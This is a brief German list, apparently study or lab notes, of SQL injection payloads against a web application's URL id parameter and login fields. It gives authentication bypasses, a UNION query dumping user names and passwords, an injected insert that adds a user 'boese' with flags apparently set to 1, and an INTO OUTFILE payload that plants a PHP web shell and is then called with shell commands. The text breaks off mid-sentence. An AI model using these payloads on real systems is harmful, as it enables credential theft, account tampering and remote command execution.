Die Exploits:
id in URL ist1 OR 1=1--
id in URL ist1 UNION SELECT Benutzer_Name,Real_Name,Passwort,Benutzer_ID FROM benutzer_tabelle;--
irgendwas' OR 1=1 --
', 1, 1)-- passwort', 0, 0), ('boese', 'boese', 'boese', 1, 1)--
id in URL ist1 UNION SELECT 1, 2, '<?php system($_GET[\'cmd\']); ?>', 4 INTO OUTFILE '/var/www/app/shell.php' --
app/shell.php?cmd= mit Shellbefehl dahinter
aufrufen, z.B.